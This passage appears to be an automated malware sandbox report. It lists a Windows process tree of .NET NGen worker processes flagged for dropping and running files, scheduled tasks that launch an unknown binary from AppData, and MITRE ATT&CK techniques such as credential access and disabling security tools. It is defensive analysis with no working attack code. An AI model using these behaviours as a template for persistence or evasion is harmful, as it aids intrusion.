  PID:2092
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1a0 -InterruptEvent 278 -NGENProcess 248 -Pipe 2c4 -Comment "NGen Worker Process"
  2⤵
  PID:2848
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 2bc -NGENProcess 268 -Pipe 2a8 -Comment "NGen Worker Process"
  2⤵
  PID:2672
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2bc -InterruptEvent 1fc -NGENProcess 2b4 -Pipe 2ac -Comment "NGen Worker Process"
  2⤵
  PID:740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1a0 -InterruptEvent 314 -NGENProcess 278 -Pipe 1fc -Comment "NGen Worker Process"
  2⤵
  PID:2200
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 2b0 -NGENProcess 2b4 -Pipe 218 -Comment "NGen Worker Process"
  2⤵
  PID:1032
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b0 -InterruptEvent 310 -NGENProcess 2bc -Pipe 2c0 -Comment "NGen Worker Process"
  2⤵
  PID:2352
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 2bc -NGENProcess 1a0 -Pipe 2a4 -Comment "NGen Worker Process"
  2⤵
  PID:2624
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 314 -NGENProcess 2c8 -Pipe 310 -Comment "NGen Worker Process"
  2⤵
  PID:2688
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 314 -NGENProcess 2d8 -Pipe 1a0 -Comment "NGen Worker Process"
  2⤵
  PID:2900
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 268 -NGENProcess 2c8 -Pipe 2b4 -Comment "NGen Worker Process"
  2⤵
  PID:1224
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 304 -NGENProcess 260 -Pipe 2b0 -Comment "NGen Worker Process"
  2⤵
  PID:2092
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 314 -NGENProcess 30c -Pipe 268 -Comment "NGen Worker Process"
  2⤵
  PID:2240
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 2f8 -NGENProcess 260 -Pipe 278 -Comment "NGen Worker Process"
  2⤵
  PID:2296
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 2f8 -NGENProcess 314 -Pipe 304 -Comment "NGen Worker Process"
  2⤵
  PID:1972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2bc -InterruptEvent 2f8 -NGENProcess 2a0 -Pipe 260 -Comment "NGen Worker Process"
  2⤵
  PID:1056
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 318 -NGENProcess 320 -Pipe 2bc -Comment "NGen Worker Process"
  2⤵
  PID:1084
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 2c8 -NGENProcess 314 -Pipe 318 -Comment "NGen Worker Process"
  2⤵
  PID:2684
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 30c -NGENProcess 2a0 -Pipe 324 -Comment "NGen Worker Process"
  2⤵
  PID:2976
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 30c -NGENProcess 2c8 -Pipe 314 -Comment "NGen Worker Process"
  2⤵
  PID:1864
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 2c8 -NGENProcess 32c -Pipe 330 -Comment "NGen Worker Process"
  2⤵
  PID:2680
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 210 -NGENProcess 25c -Pipe 240 -Comment "NGen Worker Process"
  2⤵
  PID:2340
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 274 -NGENProcess 328 -Pipe 250 -Comment "NGen Worker Process"
  2⤵
  PID:1220
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 328 -NGENProcess 30c -Pipe 25c -Comment "NGen Worker Process"
  2⤵
  PID:1916
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 2d8 -NGENProcess 320 -Pipe 274 -Comment "NGen Worker Process"
  2⤵
  PID:1672
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 2f8 -NGENProcess 30c -Pipe 23c -Comment "NGen Worker Process"
  2⤵
  PID:2240
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 298 -NGENProcess 328 -Pipe 2e0 -Comment "NGen Worker Process"
  2⤵
  PID:572
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 298 -NGENProcess 2f8 -Pipe 320 -Comment "NGen Worker Process"
  2⤵
  PID:2724
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 32c -NGENProcess 338 -Pipe 31c -Comment "NGen Worker Process"
  2⤵
  PID:1744
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 328 -NGENProcess 33c -Pipe 334 -Comment "NGen Worker Process"
  2⤵
  PID:1688
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 328 -NGENProcess 210 -Pipe 338 -Comment "NGen Worker Process"
  2⤵
  PID:1028
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 2c8 -NGENProcess 33c -Pipe 340 -Comment "NGen Worker Process"
  2⤵
  PID:1796
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 2d8 -NGENProcess 30c -Pipe 298 -Comment "NGen Worker Process"
  2⤵
  PID:2324
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 348 -NGENProcess 210 -Pipe 32c -Comment "NGen Worker Process"
  2⤵
  PID:1528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 34c -InterruptEvent 2c8 -NGENProcess 350 -Pipe 2d8 -Comment "NGen Worker Process"
  2⤵
  PID:188
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 33c -NGENProcess 354 -Pipe 34c -Comment "NGen Worker Process"
  2⤵
  PID:572
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 344 -InterruptEvent 33c -NGENProcess 248 -Pipe 350 -Comment "NGen Worker Process"
  2⤵
  PID:1272
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 328 -NGENProcess 35c -Pipe 344 -Comment "NGen Worker Process"
  2⤵
  PID:952
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 35c -NGENProcess 358 -Pipe 360 -Comment "NGen Worker Process"
  2⤵
  PID:2920
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 348 -NGENProcess 30c -Pipe 2c8 -Comment "NGen Worker Process"
  2⤵
  PID:2332
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 364 -InterruptEvent 328 -NGENProcess 368 -Pipe 35c -Comment "NGen Worker Process"
  2⤵
  PID:2644
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 354 -InterruptEvent 2f8 -NGENProcess 210 -Pipe 328 -Comment "NGen Worker Process"
  2⤵
  PID:1588
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 210 -NGENProcess 364 -Pipe 368 -Comment "NGen Worker Process"
  2⤵
  PID:1224
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 364 -NGENProcess 354 -Pipe 374 -Comment "NGen Worker Process"
  2⤵
  PID:1528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 364 -InterruptEvent 354 -NGENProcess 30c -Pipe 378 -Comment "NGen Worker Process"
  2⤵
  PID:1868
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 354 -InterruptEvent 36c -NGENProcess 358 -Pipe 348 -Comment "NGen Worker Process"
  2⤵
  PID:1760
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 37c -InterruptEvent 364 -NGENProcess 380 -Pipe 354 -Comment "NGen Worker Process"
  2⤵
  PID:1272
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 210 -NGENProcess 384 -Pipe 37c -Comment "NGen Worker Process"
  2⤵
  PID:2924
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 370 -NGENProcess 380 -Pipe 2f8 -Comment "NGen Worker Process"
  2⤵
  PID:2352
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 388 -InterruptEvent 370 -NGENProcess 210 -Pipe 364 -Comment "NGen Worker Process"
  2⤵
  PID:1772
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 370 -NGENProcess 388 -Pipe 380 -Comment "NGen Worker Process"
  2⤵
  PID:1944
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 38c -NGENProcess 394 -Pipe 30c -Comment "NGen Worker Process"
  2⤵
  PID:1528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 36c -InterruptEvent 210 -NGENProcess 398 -Pipe 33c -Comment "NGen Worker Process"
  2⤵
  PID:1124
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 384 -NGENProcess 388 -Pipe 390 -Comment "NGen Worker Process"
  2⤵
  PID:1784
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 384 -InterruptEvent 248 -NGENProcess 394 -Pipe 39c -Comment "NGen Worker Process"
  2⤵
  PID:2260
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 358 -InterruptEvent 398 -NGENProcess 3a4 -Pipe 384 -Comment "NGen Worker Process"
  2⤵
  PID:2516
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 3a4 -NGENProcess 3a0 -Pipe 3a8 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:940
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a4 -InterruptEvent 394 -NGENProcess 370 -Pipe 3ac -Comment "NGen Worker Process"
  2⤵
  PID:2724
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 394 -InterruptEvent 36c -NGENProcess 38c -Pipe 210 -Comment "NGen Worker Process"
  2⤵
  PID:1664
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 36c -NGENProcess 394 -Pipe 3a0 -Comment "NGen Worker Process"
  2⤵
  PID:684
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 36c -NGENProcess 3b0 -Pipe 38c -Comment "NGen Worker Process"
  2⤵
  PID:1904
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 36c -InterruptEvent 3bc -NGENProcess 394 -Pipe 388 -Comment "NGen Worker Process"
  2⤵
  PID:1156
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 3a4 -NGENProcess 394 -Pipe 248 -Comment "NGen Worker Process"
  2⤵
  PID:2912
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 3b4 -NGENProcess 358 -Pipe 3c4 -Comment "NGen Worker Process"
  2⤵
  PID:1828
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b4 -InterruptEvent 3b0 -NGENProcess 394 -Pipe 3c0 -Comment "NGen Worker Process"
  2⤵
  PID:320
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3c8 -InterruptEvent 3b0 -NGENProcess 3b4 -Pipe 3a4 -Comment "NGen Worker Process"
  2⤵
  PID:2716
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 370 -NGENProcess 394 -Pipe 3b8 -Comment "NGen Worker Process"
  2⤵
  PID:2400
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3d0 -InterruptEvent 3c8 -NGENProcess 3d4 -Pipe 3b0 -Comment "NGen Worker Process"
  2⤵
  PID:188
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3c8 -InterruptEvent 3bc -NGENProcess 394 -Pipe 3cc -Comment "NGen Worker Process"
  2⤵
  - Drops file in Windows directory
  PID:2828
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 398 -NGENProcess 370 -Pipe 3dc -Comment "NGen Worker Process"
  2⤵
  PID:2680
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 358 -InterruptEvent 398 -NGENProcess 3bc -Pipe 3d8 -Comment "NGen Worker Process"
  2⤵
  PID:1408
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 36c -InterruptEvent 3d0 -NGENProcess 3e4 -Pipe 358 -Comment "NGen Worker Process"
  2⤵
  PID:2600
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3d0 -InterruptEvent 3e4 -NGENProcess 3e0 -Pipe 3e8 -Comment "NGen Worker Process"
  2⤵
  PID:2096
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 370 -NGENProcess 3ec -Pipe 3d0 -Comment "NGen Worker Process"
  2⤵
  PID:2740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 394 -InterruptEvent 370 -NGENProcess 3d4 -Pipe 3e0 -Comment "NGen Worker Process"
  2⤵
  PID:2876
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3c8 -InterruptEvent 3bc -NGENProcess 3f4 -Pipe 394 -Comment "NGen Worker Process"
  2⤵
  PID:996
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 3ec -NGENProcess 3f8 -Pipe 3c8 -Comment "NGen Worker Process"
  2⤵
  PID:2296
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 36c -InterruptEvent 3d4 -NGENProcess 3fc -Pipe 398 -Comment "NGen Worker Process"
  2⤵
  PID:2656
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 14c -InterruptEvent 308 -NGENProcess 288 -Pipe 2fc -Comment "NGen Worker Process"
  2⤵
  PID:320
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 308 -NGENProcess 14c -Pipe 2cc -Comment "NGen Worker Process"
  2⤵
  PID:2152
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 308 -InterruptEvent 270 -NGENProcess 288 -Pipe 2ec -Comment "NGen Worker Process"
  2⤵
  PID:328
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 208 -NGENProcess 300 -Pipe 2e4 -Comment "NGen Worker Process"
  2⤵
  PID:2332
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 208 -NGENProcess 270 -Pipe 14c -Comment "NGen Worker Process"
  2⤵
  PID:572
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 208 -NGENProcess 2d4 -Pipe 300 -Comment "NGen Worker Process"
  2⤵
  PID:2100
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 254 -NGENProcess 224 -Pipe 270 -Comment "NGen Worker Process"
  2⤵
  PID:2916
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 254 -NGENProcess 184 -Pipe 208 -Comment "NGen Worker Process"
  2⤵
  PID:980
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 184 -NGENProcess 2e8 -Pipe 2d0 -Comment "NGen Worker Process"
  2⤵
  PID:952
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 184 -NGENProcess 254 -Pipe 198 -Comment "NGen Worker Process"
  2⤵
  PID:2900
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 308 -InterruptEvent 184 -NGENProcess 2d4 -Pipe 2e8 -Comment "NGen Worker Process"
  2⤵
  PID:2808
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 2f4 -NGENProcess 238 -Pipe 184 -Comment "NGen Worker Process"
  2⤵
  PID:3016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1596

C:\Windows\system32\taskeng.exe
taskeng.exe {DC583945-EEC1-41EE-8EBC-549820538999} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2536

C:\Windows\system32\taskeng.exe
taskeng.exe {AA4BD4BB-7806-40D8-87AC-DF4B87D00F92} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:652
- C:\Program Files\Mozilla Firefox\default-browser-agent.exe
  "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
  2⤵
  PID:1672
- C:\Users\Admin\AppData\Roaming\rvgdwch
  C:\Users\Admin\AppData\Roaming\rvgdwch
  2⤵
  PID:2380

C:\Windows\system32\taskeng.exe
taskeng.exe {716017BC-DEF9-49B3-928C-D4232B1D5B08} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2680
- C:\Users\Admin\AppData\Roaming\rvgdwch
  C:\Users\Admin\AppData\Roaming\rvgdwch
  2⤵
  PID:2600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery